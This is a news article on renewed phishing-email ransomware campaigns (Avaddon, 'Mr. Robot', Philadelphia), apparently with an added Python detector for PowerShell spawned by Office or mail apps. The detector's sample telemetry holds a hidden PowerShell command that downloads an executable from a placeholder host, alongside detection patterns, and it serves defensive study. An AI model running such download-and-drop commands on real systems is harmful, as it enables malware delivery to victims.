Ransomware: Attacks that start with phishing emails are suddenly back in fashion again

Email was once the main method for delivering ransomware. Now familiar and new forms of ransomware are using it again.
Written by Danny Palmer, Senior Writer

Ransomware attacks via email are on the rise again, with several new and familiar forms of ransomware recently being distributed with the aid of malicious payloads in phishing messages.

Email used to be the most prolific way to infect victims with ransomware, but in recent years, attackers have successfully pivoted to using remote ports, insecure public-facing servers and other vulnerabilities in enterprise networks to encrypt entire networks – often demanding hundreds of thousands of dollars in payment to release the data again.

However, in recent weeks, researchers at Proofpoint have seen a rise in the number of ransomware attacks being distributed by email – including one ransomware family that hasn't been active in years – with crooks sending out hundreds of thousands of messages every day. The email attacks use a variety of lures to trick people into opening them, including subject lines related to coronavirus.


One of the largest email campaigns is by a new ransomware called Avaddon; during one week in June, it was distributed in over one million messages, mainly targeting organisations in the US.

Avaddon uses a somewhat basic technique as a lure, with subject lines claiming to relate to a photo of the victim, preying on the potential vanity or insecurity of the victim. If the attachment is opened, it downloads Avaddon using PowerShell.
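The chain the article describes for Avaddon (a mailed attachment is opened, and the document then launches PowerShell to fetch the payload) is also what gives defenders a detection point: a mail client or Office application should almost never be the parent of a PowerShell process, let alone one run hidden, without a profile, and with a remote URL on its command line. The script below is an added illustration, not code from the article or from Proofpoint; the process-creation events are constructed sample telemetry, the process names and flag list are assumptions about a typical Windows estate, and `example.invalid` is a placeholder host.

```python
"""Flag PowerShell launched by mail or Office applications in process-creation telemetry.

Added, hypothetical example. The events below are constructed for illustration and are not
from the article; field names (parent, image, cmdline) are an assumed telemetry schema.
"""
import re

# Parents a user would reach by opening a mailed attachment (assumed set, lower-case).
OFFICE_AND_MAIL = {"outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe", "thunderbird.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}

# Flags that make a PowerShell launch non-interactive or hide it from the user.
SUSPICIOUS_FLAGS = re.compile(
    r"(?i)\s-(?:w\s+hidden|windowstyle\s+hidden|nop\b|noprofile\b|enc\b|encodedcommand\b)"
)
# Any remote URL on the command line: the downloader stage the article mentions.
URL = re.compile(r"(?i)\bhttps?://\S+")

# Constructed sample events (not real telemetry). Index 1 and 3 should be flagged.
SAMPLE_EVENTS = [
    {"parent": "OUTLOOK.EXE", "image": "WINWORD.EXE",
     "cmdline": 'WINWORD.EXE /n "C:\\Users\\alice\\Downloads\\photo.doc"'},
    {"parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": 'powershell.exe -w hidden -nop -Command "Invoke-WebRequest '
                'http://example.invalid/update.exe -OutFile $env:TEMP\\u.exe"'},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"parent": "OUTLOOK.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -c Get-Date"},
]


def analyze_event(event):
    """Return the reasons an event looks like attachment-launched PowerShell, or [] if benign.

    Only PowerShell children of a mail/Office parent are considered; the parent/child pair is
    always the first reason, and hidden/no-profile flags or a URL on the command line add more.
    """
    parent = event["parent"].lower()
    image = event["image"].lower()
    cmd = event["cmdline"]
    if image not in SCRIPT_HOSTS or parent not in OFFICE_AND_MAIL:
        return []
    reasons = [f"{event['parent']} spawned {event['image']}"]
    if SUSPICIOUS_FLAGS.search(cmd):
        reasons.append("hidden or non-interactive PowerShell flags")
    if URL.search(cmd):
        reasons.append("remote URL on the command line")
    return reasons


def scan(events):
    """Run analyze_event over a list of events and return findings with a severity.

    A URL in the command line (the download stage) makes the finding 'high'; an Office/mail
    parent launching PowerShell without one is still worth a look, so it is 'medium'.
    """
    findings = []
    for index, event in enumerate(events):
        reasons = analyze_event(event)
        if not reasons:
            continue
        severity = "high" if any("URL" in r for r in reasons) else "medium"
        findings.append({"index": index, "severity": severity, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding['severity']}] event {finding['index']}: " + "; ".join(finding["reasons"]))
```

Run against the constructed events, the script reports the Word-spawned hidden download as high severity and the Outlook-spawned no-profile launch as medium, while the user's own backup script (launched from Explorer) is ignored. In practice the same logic maps onto EDR or Sysmon process-creation events, with the parent set tuned to whatever mail and document viewers the organisation actually deploys.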

Infected computers display a ransom note demanding $800 in bitcoin in exchange for "special software" to decrypt the hard drive.

A form of ransomware-as-a-service, the attackers behind Avaddon offer a 24/7 'support' service to make sure the victims have the understanding necessary to pay the ransom – and warn that if users attempt to retrieve their files without paying, they'll lose the files forever.

A second email-based ransomware campaign detailed by researchers has been dubbed 'Mr. Robot', which has been targeting entertainment, manufacturing and construction companies across the US. Messages claiming to be from the Department of Health or healthcare services use subjects related to COVID-19 test results in an effort to lure victims into clicking a link to see a document.

If the victim clicks through, this ransomware is installed and the attackers demand $100 in exchange for the return of files. It's a very small amount compared to many ransomware campaigns, suggesting it is targeting home users, rather than businesses.

But it isn't just organisations in North America that are coming under an increasing number of attacks from ransomware via email – they're targeting Europe, too.

Researchers note that Philadelphia ransomware – returning after a three-year hiatus – is targeting manufacturing and food companies in Germany with German-language lures claiming to be from the German government.

The emails claim to contain information about the possible closure of the company due to the COVID-19 pandemic, encouraging the victim to click a link – if they do so, Philadelphia ransomware is installed, with an English-language ransom note demanding a $200 payment.

While the number of email-based ransomware attacks is still small compared to 2016 and 2017, when the likes of Locky, Cerber and GlobeImposter were being distributed in massive volumes of tens of millions of messages, the recent rise in email attacks demonstrates how flexible cyber criminals can be.

"It is a reasonable presumption that this means that email-based ransomware attacks are back on the minds of threat actors. Threat actors tend to be flexible and agile in their work," Sherrod DeGrippo, senior director of threat research and detection at Proofpoint, told ZDNet.

"They will focus on what brings the most financial gain and change tactics to get the best results. This may be a testing of the waters to see what success rates are available with this method," she added.

One reason some attackers could have shifted back towards email is because of the number of people who are now working remotely, and the reliance on email that entails. "Email allows threat actors to rely on human behavior to be successful with just one click," said DeGrippo.

In many cases, it's possible to defend against ransomware – and other malware attacks – by ensuring that networks are patched with the latest security updates, preventing attackers from exploiting known software flaws.


But businesses should also make plans to cater for the fact that at some point, someone will mistakenly click on a malicious link in a phishing email.

"Businesses must assume that someone within their organization will always click and craft a security strategy that protects people first," said DeGrippo.

"Companies should ensure they are assessing end user vulnerability and training on today's threats providing actionable skills for protecting themselves at work and at home," she added.
